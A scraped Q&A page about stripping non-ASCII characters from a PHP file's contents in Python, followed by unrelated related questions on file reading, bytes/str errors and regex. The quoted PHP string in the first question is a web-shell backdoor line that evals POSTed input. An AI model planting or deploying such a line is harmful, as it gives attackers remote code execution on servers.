Read a file with illegal characters in Python - python-3.x

I am trying to read a PHP file in Python that has illegal characters. The string is the following:
z��m���^r�^if(!empty($_POST['adbb7e61'])){eval($_POST['bba6e']);exit(0);}
I am using the following code to strip out the illegal characters but it doesn't seem to be working
EncodedString = Input.encode("ascii", "ignore")
Input = EncodedString.decode()
It results in the following string which throws an error
^r^if(!empty($_POST['adbb7e61'])){eval($_POST['bba6e']);exit(0);}
The error message is
line 480, in t_ANY_error
raise SyntaxError('illegal character', (None, t.lineno, None, t.value))
File "<string>", line 2
How can I fix this? I don't want to do it in the file being read because that would defeat the purpose of what I am trying to accomplish.

The resulting characters are within the ASCII range, thus the encode method worked just fine.
Your problem is that there are still characters that you must get rid off because they cannot be interpreted by your software.
What I guess is that you want to keep all characters after the last ^, which leads to the following code :
Input = "z��m���^r�^if(!empty($_POST['adbb7e61'])){eval($_POST['bba6e']);exit(0);}"
EncodedString = Input.encode("ascii", "ignore")
Input = EncodedString.decode().split('^')[-1]
print(Input)
# if(!empty($_POST['adbb7e61'])){eval($_POST['bba6e']);exit(0);}

Related

Count the number of characters in a file

The question:
Write a function file_size(filename) that returns a count of the number of characters in the file whose name is given as a parameter. You may assume that when being tested in this CodeRunner question your function will never be called with a non-existent filename.
For example, if data.txt is a file containing just the following line: Hi there!
A call to file_size('data.txt') should return the value 10. This includes the newline character that will be added to the line when you're creating the file (be sure to hit the 'Enter' key at the end of each line).
What I have tried:
def file_size(data):
"""Count the number of characters in a file"""
infile = open('data.txt')
data = infile.read()
infile.close()
return len(data)
print(file_size('data.txt'))
# data.txt contains 'Hi there!' followed by a new line
character.
I get the correct answer for this file however I fail a test that users a larger/longer file which should have a character count of 81 but I still get 10. I am trying to get the code to count the correct size of any file.

How to print string with embedded whitespace in python3

Assume the following string:
s = '\r\nthis is the second line\r\n\tthis line is indented\r\n'
If I run Python (v. 3.8.6) interactively, printing this string works as expected:
>>> print(s)
this is the second line
this line is indented
>>>
But when I print this string to a file (ie, print(s, file = "string.txt")), the embedded whitespace is not interpreted and the text file contains the string literally (with "\t" instead of a tab, etc).
How can I get the same interactive output written to file? Attempts using str(), f-strings, and format() were unsuccessful.
this worked for me:
with open('file.txt','w') as file:
print('\r\nthis is the second line\r\n\tthis line is indentedd\r\n',file=file)

generate a hex file by converting strings into hex from a text file in Python

I have a Python tool that generates a text file in which each line has a string. I want to generate a hex file using this text file. The file has lines the following line:
-5.139488050547036391e-01
3.181812818225058681e+00
475.465798764
abc[0]
abc[0]*abc[10]
I tried using binascii.hexlify(b'<String>'), which works when I manually enter the strings, but when I do that:
with open("strings.txt", "r") as a_file:
for line in a_file:
if not line.strip():
continue
stripped_line = line.strip()
hex_= binascii.hexlify(b'<'+ stripped_line +'>')
print(hex_)
I get this error:
TypeError: can't concat str to bytes
How can I convert those strings of different types into hex and generate a .hex file?
To convert a string (line in file) to bytes object you have to encode it. In your case, that only means to replace this line from your code
hex_= binascii.hexlify(b'<'+ stripped_line +'>')
with this line
hex_= binascii.hexlify(stripped_line.encode())
Your code ran into error, because you tried to concatenate 'b<' (byte object) with stripped_line (string object) and it has no meaning in python.

a bytes-like object is required, not 'str': typeerror in compressed file

I am finding substring in compressed file using following python script. I am getting "TypeError: a bytes-like object is required, not 'str'". Please any one help me in fixing this.
from re import *
import re
import gzip
import sys
import io
import os
seq={}
with open(sys.argv[1],'r') as fh:
for line1 in fh:
a=line1.split("\t")
seq[a[0]]=a[1]
abcd="AGATCGGAAGAGCTCGTATGCCGTCTTCTGCTTG"
print(a[0],"\t",seq[a[0]])
count={}
with gzip.open(sys.argv[2]) as gz_file:
with io.BufferedReader(gz_file) as f:
for line in f:
for b in seq:
if abcd in line:
count[b] +=1
for c in count:
print(c,"\t",count[c])
fh.close()
gz_file.close()
f.close()
and input files are
TruSeq2_SE AGATCGGAAGAGCTCGTATGCCGTCTTCTGCTTG
the second file is compressed text file. The line "if abcd in line:" shows the error.
The "BufferedReader" class gives you bytestrings, not text strings - you can directly compare both objects in Python3 -
Since these strings just use a few ASCII characters and are not actually text, you can work all the way along with byte strings for your code.
So, whenever you "open" a file (not gzip.open), open it in binary mode (i.e.
open(sys.argv[1],'rb') instead of 'r' to open the file)
And also prefix your hardcoded string with a b so that Python uses a binary string inernally: abcd=b"AGATCGGAAGAGCTCGTATGCCGTCTTCTGCTTG" - this will avoid a similar error on your if abcd in line - though the error message should be different than the one you presented.
Alternativally, use everything as text - this can give you more methods to work with the strings (Python3's byte strigns are somewhat crippled) presentation of data when printing, and should not be much slower - in that case, instead of the changes suggested above, include an extra line to decode the line fetched from your data-file:
with io.BufferedReader(gz_file) as f:
for line in f:
line = line.decode("latin1")
for b in seq:
(Besides the error, your progam logic seens to be a bit faulty, as you don't actually use a variable string in your innermost comparison - just the fixed bcd value - but I suppose you can fix taht once you get rid of the errors)

Extracting source code from html file using python3.1 urllib.request

I'm trying to obtain data using regular expressions from a html file, by implementing the following code:
import urllib.request
def extract_words(wdict, urlname):
uf = urllib.request.urlopen(urlname)
text = uf.read()
print (text)
match = re.findall("<tr>\s*<td>([\w\s.;'(),-/]+)</td>\s+<td>([\w\s.,;'()-/]+)</td>\s*</tr>", text)
which returns an error:
File "extract.py", line 33, in extract_words
match = re.findall("<tr>\s*<td>([\w\s.;'(),-/]+)</td>\s+<td>([\w\s.,;'()-/]+)</td>\s*</tr>", text)
File "/usr/lib/python3.1/re.py", line 192, in findall
return _compile(pattern, flags).findall(string)
TypeError: can't use a string pattern on a bytes-like object
Upon experimenting further in the IDLE, I noticed that the uf.read() indeed returns the html source code the first time I invoke it. But then onwards, it returns a - b''. Is there any way to get around this?
uf.read() will only read the contents once. Then you have to close it and reopen it to read it again. This is true for any kind of stream. This is however not the problem.
The problem is that reading from any kind of binary source, such as a file or a webpage, will return the data as a bytes type, unless you specify an encoding. But your regexp is not specified as a bytes type, it's specified as a unicode str.
The re module will quite reasonably refuse to use unicode patterns on byte data, and the other way around.
The solution is to make the regexp pattern a bytes string, which you do by putting a b in front of it. Hence:
match = re.findall(b"<tr>\s*<td>([\w\s.;'(),-/]+)</td>\s+<td>([\w\s.,;'()-/]+)</td>\s*</tr>", text)
Should work. Another option is to decode the text so it also is a unicode str:
encoding = uf.headers.getparam('charset')
text = text.decode(encoding)
match = re.findall("<tr>\s*<td>([\w\s.;'(),-/]+)</td>\s+<td>([\w\s.,;'()-/]+)</td>\s*</tr>", text)
(Also, to extract data from HTML, I would say that lxml is a better option).

Resources